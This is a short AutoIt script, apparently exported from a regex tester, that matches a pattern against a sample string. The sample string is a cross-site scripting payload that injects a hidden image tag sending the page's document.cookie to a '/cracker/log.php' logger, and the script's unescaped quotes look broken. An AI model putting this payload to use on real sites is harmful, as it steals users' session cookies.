#include <StringConstants.au3> ; to declare the Constants of StringRegExp
#include <Array.au3> ; UDF needed for _ArrayDisplay and _ArrayConcatenate
Local $sRegex = "(?:[\s\/"]+[-\w\/\\\*]+\s*=.+(?:\/\s*>))"
Local $sString = "this.style.display='none';this.insertAdjacentHTML('afterend','<img src="/cracker/log.php?cookie='+encodeURIComponent(document.cookie)+'" style="display:none" />');"
Local $aArray = StringRegExp($sString, $sRegex, $STR_REGEXPARRAYFULLMATCH)
; Present the entire match result
_ArrayDisplay($aArray, "Result")